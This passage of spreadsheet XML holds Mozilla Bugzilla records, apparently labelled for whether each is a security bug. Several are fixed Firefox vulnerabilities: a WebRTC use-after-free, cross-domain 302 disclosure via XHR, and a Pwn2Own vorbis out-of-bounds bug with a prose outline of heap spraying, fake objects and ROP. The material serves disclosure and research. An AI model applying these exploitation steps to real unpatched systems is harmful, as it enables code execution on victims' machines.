          <t>FIXED</t>
        </is>
      </c>
      <c r="P3563" t="inlineStr"/>
      <c r="Q3563" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3563" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3563" t="inlineStr">
        <is>
          <t>Firefox 54</t>
        </is>
      </c>
      <c r="T3563" t="n">
        <v>1</v>
      </c>
      <c r="U3563" t="n">
        <v>0</v>
      </c>
      <c r="V3563" t="n">
        <v>12</v>
      </c>
      <c r="W3563" t="inlineStr">
        <is>
          <t>Investigating bug 1165811, I changed getTabState in tabs.js to:
  getTabState: function (tab) {
    throw new Error("oh no");
And noticed the following badness:
* We catch the exception at https://dxr.mozilla.org/mozilla-central/rev/2977ca1224525680cbfb5c3ce3018818b6dfd8f2/services/sync/modules/engines.js#1588
* We then fail to count the record as a failure, meaning the error isn't recorded to telemetry. This makes it impossible to determine how many users might be seeing such errors.
* We fail to honor this.allowSkippedRecord, and thus we may end up uploading an inconsistent state for things like bookmarks.
In an ideal world me might want to differentiate the failures here (ie, to differentiate if the error was an unhandled exception or was rejected by the server) and to record details of the exceptions encountered, but just counting them as the same in the short term would be an improvement.</t>
        </is>
      </c>
      <c r="X3563" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3564">
      <c r="A3564" t="n">
        <v>1826002</v>
      </c>
      <c r="B3564" t="inlineStr">
        <is>
          <t>2023-04-02 11:09:42 -0700</t>
        </is>
      </c>
      <c r="C3564" t="inlineStr">
        <is>
          <t>Use-after-free on freebl3!SHA256_Update_Native at sha256-x86.c on OOM</t>
        </is>
      </c>
      <c r="D3564" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:44 -0700</t>
        </is>
      </c>
      <c r="E3564" t="n">
        <v>1</v>
      </c>
      <c r="F3564" t="n">
        <v>1</v>
      </c>
      <c r="G3564" t="n">
        <v>3</v>
      </c>
      <c r="H3564" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3564" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3564" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K3564" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3564" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3564" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3564" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3564" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3564" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main115+][adv-esr102.13+]</t>
        </is>
      </c>
      <c r="Q3564" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3564" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3564" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T3564" t="n">
        <v>1</v>
      </c>
      <c r="U3564" t="n">
        <v>0</v>
      </c>
      <c r="V3564" t="n">
        <v>47</v>
      </c>
      <c r="W3564" t="inlineStr">
        <is>
          <t>Created attachment 9326471
testcase1.html
On Firefox 32-bit after filling memory around 2700mb, then call `new RTCPeerConnection()` and `new Worker` the tab able to crash at `ACCESS_VIOLATION_READ` on `SHA256_Update_Native` at sha256-x86.c on address `0xe5e5e5e5`, the address can be changed dynamically to e.g. `0xe5eff000`, `0xe5f0000`, `0xe6901000`, and more.
The testcase is currently intermittent, it commonly crash at mozalloc_abort breakpoint rather than SHA256_Update_Native, I'll post update when I found more reliable testcase.
After spent some time debugging through WinDbg, on the stack `PeerConnectionImpl::SetCertificate(mozilla::dom::RTCCertificate&amp; aCertificate)` the `aCertificate-&gt;mCertificate` sub-variable e.g. extensions, emailAddr, keyUsage, derCert, and more value is already set at `0xe5e5e5e5`, then that `mCertificate` is passed to `SHA256_Update_Native` causing the `ACCESS_VIOLATION_READ`.
When looking at RTCCertificate.cpp code, it looks like the code is called from another thread, on the `WebCryptoTask::Run()` there are code comment "// Run heavy crypto operations on the thread pool, off the original thread.". 
I then add printf to print address of `mCertificate` from `RTCCertificate!SignCertificate` and `PeerConnectionImpl::SetCertificate` to match the address, when calling simple function `new RTCPeerConnection()` both `mCertificate` address is match, but when visiting the testcase which do repeatedly in loop, the `mCertificate` address is out of sync, it looks like the RTCCertificate is generate too excessive `mCertificate`, then older `mCertificate` is freed, after that the `PeerConnectionImpl::SetCertificate` is still taking the old (freed) `mCertificate` address rather than fresh `mCertificate` which causing the use-after-free.
## Tested on:
- Firefox 113.0a1 (2023-04-01) (32-bit)
- Firefox 111.0.1 (32-bit)
## Steps to reproduce:
1. Open Firefox 32-bit
2. Visit attached testcase1.html on HTTPS site
3. After a while the tabs is crashed
4. Analyze the crash dump
If Firefox crash at EXCEPTION_BREAKPOINT, try again until it crashes at EXCEPTION_ACCESS_VIOLATION.</t>
        </is>
      </c>
      <c r="X3564" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3565">
      <c r="A3565" t="n">
        <v>458248</v>
      </c>
      <c r="B3565" t="inlineStr">
        <is>
          <t>2008-10-02 11:21:01 -0700</t>
        </is>
      </c>
      <c r="C3565" t="inlineStr">
        <is>
          <t>XMLHttpRequest 302 response disclosure</t>
        </is>
      </c>
      <c r="D3565" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3565" t="n">
        <v>1</v>
      </c>
      <c r="F3565" t="n">
        <v>1</v>
      </c>
      <c r="G3565" t="n">
        <v>3</v>
      </c>
      <c r="H3565" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3565" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3565" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3565" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3565" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3565" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3565" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3565" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3565" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3565" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3565" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3565" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T3565" t="n">
        <v>1</v>
      </c>
      <c r="U3565" t="n">
        <v>0</v>
      </c>
      <c r="V3565" t="n">
        <v>23</v>
      </c>
      <c r="W3565" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9) Gecko/2008052912 Firefox/3.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9) Gecko/2008052912 Firefox/3.0
A XMLHttpRequest which hits a 302 to another domain returns the 302 headers and body. In single-signon environments these headers might contain sensitive url parameters.
The XMLHttpRequest originates from source domain, but the SSO state could be protected with HttpOnly. Returning the 302 headers allows for using the SSO state as an oracle to mints access tokens for other domains.
All other browsers I tested do not return such 302 responses to the script.
Reproducible: Always
Steps to Reproduce:
1.Setup a server that has a 302 to another domain
2.Issue XHR, in domain, to the url that will 302
3.Observe the 302 headers and body are available to the XHR issuer
Actual Results:  
302 headers and body, with location being a different protocol:host:port/path?params
Expected Results:  
Security exception or no data. Other browsers return status 0 and no content. Or throw security exceptions.
Since other browsers do not return data, it is unlikely that tightening this up will break existing applications.
As for precedents regarding fixing this type of bug, see https://bugzilla.mozilla.org/show_bug.cgi?id=397427</t>
        </is>
      </c>
      <c r="X3565" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3566">
      <c r="A3566" t="n">
        <v>1043882</v>
      </c>
      <c r="B3566" t="inlineStr">
        <is>
          <t>2014-07-25 02:58:37 -0700</t>
        </is>
      </c>
      <c r="C3566" t="inlineStr">
        <is>
          <t>Migrate PivotalTracker bug reports &amp; feature requests to Bugzilla</t>
        </is>
      </c>
      <c r="D3566" t="inlineStr">
        <is>
          <t>2015-05-12 07:03:17 -0700</t>
        </is>
      </c>
      <c r="E3566" t="n">
        <v>1</v>
      </c>
      <c r="F3566" t="n">
        <v>1</v>
      </c>
      <c r="G3566" t="n">
        <v>7</v>
      </c>
      <c r="H3566" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3566" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3566" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3566" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3566" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3566" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3566" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3566" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3566" t="inlineStr"/>
      <c r="Q3566" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R3566" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3566" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3566" t="n">
        <v>1</v>
      </c>
      <c r="U3566" t="n">
        <v>0</v>
      </c>
      <c r="V3566" t="n">
        <v>2</v>
      </c>
      <c r="W3566" t="inlineStr">
        <is>
          <t>The treeherder pivotal tracker project contains bug reports and feature requests that are now probably best put in Bugzilla:
https://www.pivotaltracker.com/s/projects/749519
jeads/camd/mdoglio: Not sure if you wish to continue using Pivotal Tracker for internal sub-task tracking etc, but I think things like:
* "updating an exclusion profile doesn't change the filtering immediately.  Must reload page."
* "integrate m-cmerge with treeherder for post-merge tasks"
...are external-facing enough that they need to be in Bugzilla (even if there is a non-canonical mirror story open in Pivotal Tracker).</t>
        </is>
      </c>
      <c r="X3566" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3567">
      <c r="A3567" t="n">
        <v>358797</v>
      </c>
      <c r="B3567" t="inlineStr">
        <is>
          <t>2006-10-30 11:57:31 -0800</t>
        </is>
      </c>
      <c r="C3567" t="inlineStr">
        <is>
          <t>range.createContextualFragment() crash when range node is DocType</t>
        </is>
      </c>
      <c r="D3567" t="inlineStr">
        <is>
          <t>2013-04-04 13:53:36 -0700</t>
        </is>
      </c>
      <c r="E3567" t="n">
        <v>1</v>
      </c>
      <c r="F3567" t="n">
        <v>1</v>
      </c>
      <c r="G3567" t="n">
        <v>3</v>
      </c>
      <c r="H3567" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3567" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3567" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3567" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3567" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3567" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3567" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3567" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3567" t="inlineStr"/>
      <c r="Q3567" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3567" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3567" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3567" t="n">
        <v>1</v>
      </c>
      <c r="U3567" t="n">
        <v>0</v>
      </c>
      <c r="V3567" t="n">
        <v>24</v>
      </c>
      <c r="W3567" t="inlineStr">
        <is>
          <t>Carlos Barros reported a DoS crash calling Mozilla-specific createContextualFragment on a range whose selected node is the DocType. This leads to a null-dereference crash in FF1.5.0.x and FF2
http://www.gotfault.net/research/advisory/gadv-firefox.txt
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050416.html
According to the DOM spec trying to select the DocType should raise an exception
http://www.w3.org/TR/2000/REC-DOM-Level-2-Traversal-Range-20001113/ranges.html#Level2-Range-method-selectNode</t>
        </is>
      </c>
      <c r="X3567" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3568">
      <c r="A3568" t="n">
        <v>34168</v>
      </c>
      <c r="B3568" t="inlineStr">
        <is>
          <t>2000-03-31 19:13:45 -0800</t>
        </is>
      </c>
      <c r="C3568" t="inlineStr">
        <is>
          <t>can crash parser with following dtd entry</t>
        </is>
      </c>
      <c r="D3568" t="inlineStr">
        <is>
          <t>2009-02-10 01:36:33 -0800</t>
        </is>
      </c>
      <c r="E3568" t="n">
        <v>1</v>
      </c>
      <c r="F3568" t="n">
        <v>1</v>
      </c>
      <c r="G3568" t="n">
        <v>3</v>
      </c>
      <c r="H3568" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3568" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3568" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K3568" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3568" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3568" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3568" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3568" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3568" t="inlineStr">
        <is>
          <t>[relnote-devel]</t>
        </is>
      </c>
      <c r="Q3568" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3568" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3568" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T3568" t="n">
        <v>1</v>
      </c>
      <c r="U3568" t="n">
        <v>0</v>
      </c>
      <c r="V3568" t="n">
        <v>62</v>
      </c>
      <c r="W3568" t="inlineStr">
        <is>
          <t>The following crashes &lt;!ENTITY  editAwayMessageSpecial3.label " %%d = Current
date"&gt;
If you take away the %%, and replace with %, then the dtd is found to be
invalid. If you take away the % signs altogether, it parses just fine.
The bug is we shouldn't crash. If % signs should be recognized, perhaps that is
another bug.</t>
        </is>
      </c>
      <c r="X3568" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3569">
      <c r="A3569" t="n">
        <v>1446062</v>
      </c>
      <c r="B3569" t="inlineStr">
        <is>
          <t>2018-03-15 10:59:04 -0700</t>
        </is>
      </c>
      <c r="C3569" t="inlineStr">
        <is>
          <t>ZDI-CAN-5822 - Mozilla Firefox Audio Driver Out of Bounds</t>
        </is>
      </c>
      <c r="D3569" t="inlineStr">
        <is>
          <t>2018-11-07 14:47:09 -0800</t>
        </is>
      </c>
      <c r="E3569" t="n">
        <v>1</v>
      </c>
      <c r="F3569" t="n">
        <v>1</v>
      </c>
      <c r="G3569" t="n">
        <v>3</v>
      </c>
      <c r="H3569" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3569" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3569" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3569" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3569" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3569" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3569" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3569" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3569" t="inlineStr">
        <is>
          <t>[Pwn2Own 2018]</t>
        </is>
      </c>
      <c r="Q3569" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3569" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3569" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T3569" t="n">
        <v>1</v>
      </c>
      <c r="U3569" t="n">
        <v>0</v>
      </c>
      <c r="V3569" t="n">
        <v>53</v>
      </c>
      <c r="W3569" t="inlineStr">
        <is>
          <t>Created attachment 8959226
POC
From exploit files:
Mozilla Firefox to SYSTEM exploit by Richard Zhu (fluorescence)
The exploit uses an out of bounds bug in audio parsing to achieve code execution inside Firefox.
The vulnerability occurs when parsing vorbis audio formats:
long vorbis_book_decodev_add(codebook *book,float *a,oggpack_buffer *b,int n){
  if(book-&gt;used_entries&gt;0){
    int i,j,entry;
    float *t;
    if(book-&gt;dim&gt;8){
      for(i=0;i&lt;n;){
        entry = decode_packed_entry_number(book,b);
        if(entry==-1)return(-1);
        t     = book-&gt;valuelist+entry*book-&gt;dim;
        for (j=0;j&lt;book-&gt;dim;)
          a[i++]+=t[j++]; // out of bounds access, i can be greater than n
      }
To exploit this, I do a mixed spray of Arrays and ArrayBuffers.
I load the audio file to trigger the out of bounds bug, which will overwrite the length of an Array.
I then find an ArrayBuffer allocated after the corrupted Array.
Because the array's length has been changed, I can freely read and write into the ArrayBuffer from the Array.
I write JS objects into the ArrayBuffer and read their addresses.
Then, I use this ArrayBuffer to create fake objects.
These objects can be retrieved by the corrupted Array, leading to arbitrary read/write.
Then, I hijack a vtable and ROP to get code execution.</t>
        </is>
      </c>
      <c r="X3569" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3570">
      <c r="A3570" t="n">
        <v>204673</v>
      </c>
      <c r="B3570" t="inlineStr">
        <is>
          <t>2003-05-06 15:26:25 -0700</t>
        </is>
      </c>
      <c r="C3570" t="inlineStr">
        <is>
          <t>throbber icon keeps spinning after viewing previously read mail</t>
        </is>
      </c>
      <c r="D3570" t="inlineStr">
        <is>
          <t>2011-08-05 22:33:22 -0700</t>
        </is>
      </c>
      <c r="E3570" t="n">
        <v>1</v>
      </c>
      <c r="F3570" t="n">
        <v>1</v>
      </c>
      <c r="G3570" t="n">
        <v>2</v>
      </c>
      <c r="H3570" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3570" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3570" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K3570" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3570" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3570" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3570" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3570" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3570" t="inlineStr">
        <is>
          <t>[adt1]</t>
        </is>
      </c>
      <c r="Q3570" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3570" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3570" t="inlineStr">
        <is>
          <t>mozilla1.4beta</t>
        </is>
      </c>
      <c r="T3570" t="n">
        <v>1</v>
      </c>
      <c r="U3570" t="n">
        <v>0</v>
      </c>
      <c r="V3570" t="n">
        <v>15</v>
      </c>
      <c r="W3570" t="inlineStr">
        <is>
          <t>found using 2003.05.06.09 comm bits --this was not a problem with 2003.05.05.08
bits.
i originally saw this on linux rh8.0; ninoschka confirmed this on Mac OS X, and
scott saw this on win32.
0. have an imap account set up.
1. in the mail 3pane window, click on some msgs in the thread pane to view them.
2. click again on one of the messages you had viewed in step 1 (now cached).
results: throbber starts to spin...and doesn't stop unless i click on a folder
that's either empty or has new messages.</t>
        </is>
      </c>
      <c r="X3570" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3571">
      <c r="A3571" t="n">
        <v>616060</v>
      </c>
      <c r="B3571" t="inlineStr">
        <is>
          <t>2010-12-01 18:18:22 -0800</t>
        </is>
      </c>
      <c r="C3571" t="inlineStr">
        <is>
          <t>Elimination of search bar in Refresh removes access to a number of advanced search parameters</t>
        </is>
      </c>
      <c r="D3571" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E3571" t="n">
        <v>1</v>
      </c>
      <c r="F3571" t="n">
        <v>1</v>
      </c>
      <c r="G3571" t="n">
        <v>6</v>
      </c>
      <c r="H3571" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3571" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3571" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K3571" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3571" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3571" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3571" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3571" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3571" t="inlineStr">
        <is>
          <t>[aw crap] [z]</t>
        </is>
      </c>
      <c r="Q3571" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3571" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3571" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3571" t="n">
        <v>1</v>
      </c>
      <c r="U3571" t="n">
        <v>0</v>
      </c>
      <c r="V3571" t="n">
        <v>7</v>
      </c>
      <c r="W3571" t="inlineStr">
        <is>
          <t>Many of our advanced search params are listed as a facet on the search pages, but a few (Platform and Last Updated) that are missing. In the new design, the removal of Advanced Search makes these options inaccessible. Also, the 'search within' is now missing. Essentially, we're missing a design for AMO's SERP that is compatible with thew new refresh.</t>
        </is>
      </c>
      <c r="X3571" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3572">
      <c r="A3572" t="n">
        <v>1200869</v>
      </c>
      <c r="B3572" t="inlineStr">
        <is>
          <t>2015-09-01 16:32:13 -0700</t>
        </is>
      </c>
      <c r="C3572" t="inlineStr">
        <is>
          <t>CORS preflight cache poisoning with a CORS header being mistaken with another CORS header</t>
        </is>
      </c>
      <c r="D3572" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3572" t="n">
        <v>1</v>
      </c>
      <c r="F3572" t="n">
        <v>1</v>
      </c>
      <c r="G3572" t="n">
        <v>3</v>
      </c>
      <c r="H3572" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3572" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3572" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3572" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3572" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3572" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3572" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3572" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3572" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q3572" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3572" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3572" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T3572" t="n">
        <v>1</v>
      </c>
      <c r="U3572" t="n">
        <v>0</v>
      </c>
      <c r="V3572" t="n">
        <v>19</v>
      </c>
      <c r="W3572" t="inlineStr">
        <is>
          <t>There is a bug in nsCORSPreflightListener::AddResultToCache() in that we call GetResponseHeader() without emptying out the out value passed to it, which causes us to mistake the value of a header that we have checked before with the next header if the response doesn't include the next header.  This hits us in three cases:
* If the preflight response includes Access-Control-Max-Age, but not Access-Control-Allow-Methods, when we check for Access-Control-Allow-Methods, we mistakenly use the value of the Access-Control-Max-Age header.  Even though Access-Control-Max-Age can only be a string parseable as a number, surprisingly nothing actually fails an attempt to XHR with a method equal to such a string!
* If the preflight response includes Access-Control-Allow-Methods but not Access-Control-Allow-Headers, we use the value of the Access-Control-Allow-Methods instead of the Access-Control-Allow-Headers.
* If the preflight response includes Access-Control-Max-Age but not Access-Control-Allow-Headers nor Access-Control-Allow-Methods, when we check for Access-Control-Allow-Headers, we mistakenly use the value of the Access-Control-Max-Age header.
I think the third bug is not possible to trigger from script since there is no way to force a preflight without using a non-simple method or header, and the CORS preflight will fail in that case without either an Access-Control-Allow-Headers or an Access-Control-Allow-Methods header.
Going back in the history, I think we have had this bug since forever.  It definitely predates bug 644476, similar to bug 1200856.  I didn't look back further.</t>
        </is>
      </c>
      <c r="X3572" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3573">
      <c r="A3573" t="n">
        <v>562442</v>
      </c>
      <c r="B3573" t="inlineStr">
        <is>
          <t>2010-04-28 13:09:45 -0700</t>
        </is>
      </c>
      <c r="C3573" t="inlineStr">
        <is>
          <t>Crash in [@ nsPluginInstanceOwner::ReleasePluginPort(void*)]</t>
        </is>
      </c>
      <c r="D3573" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3573" t="n">
        <v>1</v>
      </c>
      <c r="F3573" t="n">
        <v>1</v>
      </c>
      <c r="G3573" t="n">
        <v>6</v>
      </c>
      <c r="H3573" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3573" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3573" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3573" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3573" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3573" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3573" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3573" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3573" t="inlineStr">
        <is>
          <t>[sg:high][qa!]</t>
        </is>
      </c>
      <c r="Q3573" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3573" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3573" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3573" t="n">
        <v>1</v>
      </c>
      <c r="U3573" t="n">
        <v>1</v>
      </c>
      <c r="V3573" t="n">
        <v>13</v>
      </c>
      <c r="W3573" t="inlineStr">
        <is>
          <t>Seen while running Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.3a5pre) Gecko/20100428 Minefield/3.7a5pre
https://crash-stats.mozilla.com/report/index/7c982f11-1f35-42ca-bb03-c34a92100428
STR:
1. I was composing an email in Gmail.
2. Added http://www.caltrain.com/pdf/Holiday_Schedules/Caltrain_Weekend_Holiday_Schedule_08-31-2009.pdf to the email and hit Send.
3. The crash occurred
Have not been able to repro
Frame  	Module  	Signature [Expand]  	Source
0 	xul.dll 	nsPluginInstanceOwner::ReleasePluginPort 	layout/generic/nsObjectFrame.cpp:5725
1 	xul.dll 	nsObjectFrame::CallSetWindow 	layout/generic/nsObjectFrame.cpp:1057
2 	xul.dll 	nsObjectFrame::DidReflow 	layout/generic/nsObjectFrame.cpp:1149
3 	xul.dll 	nsLineLayout::ReflowFrame 	layout/generic/nsLineLayout.cpp:967
4 	xul.dll 	nsBlockFrame::ReflowInlineFrame 	layout/generic/nsBlockFrame.cpp:3716
5 	xul.dll 	nsBlockFrame::DoReflowInlineFrames 	layout/generic/nsBlockFrame.cpp:3511
6 	xul.dll 	nsBlockFrame::ReflowInlineFrames 	layout/generic/nsBlockFrame.cpp:3365
7 	xul.dll 	nsBlockFrame::ReflowLine 	layout/generic/nsBlockFrame.cpp:2461
8 	xul.dll 	nsBlockFrame::ReflowDirtyLines 	layout/generic/nsBlockFrame.cpp:1907
9 	xul.dll 	nsBlockFrame::Reflow 	layout/generic/nsBlockFrame.cpp:1009
10 	xul.dll 	nsContainerFrame::ReflowChild 	layout/generic/nsContainerFrame.cpp:736
11 	xul.dll 	nsHTMLReflowState::Init 	layout/generic/nsHTMLReflowState.cpp:285
12 	xul.dll 	nsCSSFrameConstructor::RestyleElement 	layout/base/nsCSSFrameConstructor.cpp:8007
13 		@0x3802a3f</t>
        </is>
      </c>
      <c r="X3573" t="n">
        <v>1</v>
      </c>
    </row>
